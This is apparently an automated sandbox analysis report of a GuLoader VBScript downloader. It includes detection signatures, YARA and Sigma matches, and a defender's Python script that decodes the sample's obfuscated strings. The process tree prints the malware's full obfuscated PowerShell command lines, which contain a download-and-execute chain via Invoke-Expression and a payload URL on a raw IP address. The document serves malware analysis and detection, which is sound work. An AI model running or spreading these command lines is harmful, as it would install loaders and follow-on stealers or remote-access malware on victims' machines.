

Windows Analysis Report
Agterdelen.vbs

Overview

General Information

Sample name:Agterdelen.vbs
Analysis ID:1665610
MD5:00aac0b28f4c3970a69309489db29b89
SHA1:3d6214dcc63c9d3ffbfbfd402c62b99697787c69
SHA256:200aa88835a9db6e9af5dad6550e26806ea869ce94b9c8098c68521bf3bc6af4

Detection

GuLoader
Score:96
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7832 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. 
rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe 
DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. 
Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1040 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. 
rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe 
DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. 
Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
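The PowerShell command line in the process tree above carries its own string decoder. `$Thickskulled` is concatenated from `'func'`, `'t'`, `'i'` and `'on:'` into the literal `function:`, and `ni -p function: -n Centralkomites -value {...}` (New-Item on the function: drive) then defines a function without ever writing the `function` keyword. Centralkomites keeps every 6th character of its argument starting at offset 5 and drops the filler; `Desiodothyroxine3` passes each decoded string to `.($Likrer)`, and `$Likrer` decodes to `iEx`, so every decoded string is run through Invoke-Expression. The Python below is an added example, not code from Joe Sandbox or from the sample: it recovers the offset and stride from the decoder definition with a regular expression and applies them to the single-quoted literals. The input is assembled from fragments of the command line shown above. Several other literals on this page no longer decode because the page rendering appears to have collapsed runs of consecutive spaces, and the filler is whitespace-sensitive; only literals whose spacing survived are included.

```python
import re

# Excerpt assembled from fragments of the powershell.exe command line shown in the
# process tree: the decoder definition plus five literals it is applied to. The filler
# characters are the sample's own; only literals whose spacing survived extraction are used.
SAMPLE_CMDLINE = (
    "(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);"
    "$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];"
    "$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});"
    "$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';"
    "$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';"
    "$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';"
    "$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1"
    " arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalG"
    "J ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';"
    "$Likrer=Centralkomites 'RykkeiIsthmEPermix';"
)

# Matches the decoder as the sample writes it:
#   -n <name> -value { param($s);$i=<offset>;do {$out+=$s[$i];$i+=<stride>} ...
# Variable names are arbitrary (they change per build), so they are matched as \w+.
DECODER_RE = re.compile(
    r"-n\s+(?P<name>\w+)\s+-value\s*\{\s*param\(\$\w+\);"
    r"\$(?P<ctr>\w+)=(?P<offset>\d+);do\s*\{\$\w+\+=\$\w+\[\$(?P=ctr)\];"
    r"\$(?P=ctr)\+=(?P<stride>\d+)\}"
)


def find_decoder(cmdline):
    """Return (function name, offset, stride) of the stride decoder, or raise."""
    m = DECODER_RE.search(cmdline)
    if not m:
        raise ValueError("no stride decoder definition found")
    return m.group("name"), int(m.group("offset")), int(m.group("stride"))


def stride_decode(s, offset, stride):
    """Same result as the PowerShell loop: s[offset], s[offset+stride], ... until the
    index runs past the end of the string (the until(!$s[$i]) condition)."""
    return s[offset::stride]


def decode_literals(cmdline):
    """Decode every single-quoted literal passed directly to the decoder function,
    in the order they appear. Handles the PowerShell '' escape inside '...'."""
    name, offset, stride = find_decoder(cmdline)
    call = re.compile(re.escape(name) + r"\s+'((?:[^']|'')*)'")
    return [stride_decode(m.group(1).replace("''", "'"), offset, stride)
            for m in call.finditer(cmdline)]


def extract_urls(cmdline):
    """Decoded strings that look like download URLs. PowerShell is case-insensitive,
    so the decoded text is compared lower-cased."""
    return [d for d in decode_literals(cmdline)
            if d.lower().startswith(("http://", "https://"))]


if __name__ == "__main__":
    name, offset, stride = find_decoder(SAMPLE_CMDLINE)
    print(f"decoder {name}: offset={offset} stride={stride}")
    for decoded in decode_literals(SAMPLE_CMDLINE):
        print(repr(decoded))
```

Decoded values come out in mixed case (`uSer-AGEnT`, `iEx`, `Tls12`) because PowerShell cmdlet, method and header names are case-insensitive; lower-case them before matching against your own indicator lists. The `$Briggsk116` literal decodes to the same URL the sandbox saw in the HTTP GET further down, which is the quickest way to confirm the decoder parameters are right. The regex tolerates renamed variables and a different offset or stride, but not a structurally different loop; for a build that changes the loop shape, read the parameters off the command line by hand and call stride_decode directly.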
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source / Rule / Description / Author / Strings
Source: 00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 8104; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 8104; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
      • 0x21f3f7:$b2: ::FromBase64String(
      • 0x21f42e:$b2: ::FromBase64String(
      • 0x21f466:$b2: ::FromBase64String(
      • 0x21f49f:$b2: ::FromBase64String(
      • 0x21f4d9:$b2: ::FromBase64String(
      • 0x21f514:$b2: ::FromBase64String(
      • 0x21f550:$b2: ::FromBase64String(
      • 0x21f58d:$b2: ::FromBase64String(
      • 0x21f5cb:$b2: ::FromBase64String(
      • 0x21f60a:$b2: ::FromBase64String(
      • 0x21f64a:$b2: ::FromBase64String(
      • 0x2b8ed8:$b2: ::FromBase64String(
      • 0x9247:$s1: -join
      • 0x59df8:$s1: -join
      • 0x5ece2:$s1: -join
      • 0x136c3c:$s1: -join
      • 0x2e1363:$s1: -join
      • 0x2ec99e:$s1: -join
      • 0x2f9a73:$s1: -join
      • 0x2fce45:$s1: -join
      • 0x2fd4f7:$s1: -join
Source: Process Memory Space: powershell.exe PID: 1040; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 1040; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
        • 0xb6c24:$b2: ::FromBase64String(
        • 0xb208a:$s1: -join
        • 0x178de6:$s1: -join
        • 0x185ebb:$s1: -join
        • 0x18928d:$s1: -join
        • 0x18993f:$s1: -join
        • 0x18b430:$s1: -join
        • 0x18d636:$s1: -join
        • 0x18de5d:$s1: -join
        • 0x18e6cd:$s1: -join
        • 0x18ee08:$s1: -join
        • 0x18ee3a:$s1: -join
        • 0x18ee82:$s1: -join
        • 0x18eea1:$s1: -join
        • 0x18f6f1:$s1: -join
        • 0x18f86d:$s1: -join
        • 0x18f8e5:$s1: -join
        • 0x18f978:$s1: -join
        • 0x18fbde:$s1: -join
        • 0x191d74:$s1: -join
        • 0x1a07be:$s1: -join
Source / Rule / Description / Author / Strings
Source: amsi64_8104.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi32_1040.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
          • 0xcf7d:$b2: ::FromBase64String(
          • 0xc9ac:$s1: -join
          • 0x6158:$s4: +=
          • 0x621a:$s4: +=
          • 0xa441:$s4: +=
          • 0xc55e:$s4: +=
          • 0xc848:$s4: +=
          • 0xc98e:$s4: +=
          • 0x168b0:$s4: +=
          • 0x16930:$s4: +=
          • 0x169f6:$s4: +=
          • 0x16a76:$s4: +=
          • 0x16c4c:$s4: +=
          • 0x16cd0:$s4: +=
          • 0x3bce:$e4: Get-WmiObject
          • 0x3dbd:$e4: Get-Process
          • 0x3e15:$e4: Start-Process
          • 0x17550:$e4: Get-Process

          System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", ProcessId: 7832, ProcessName: wscript.exe
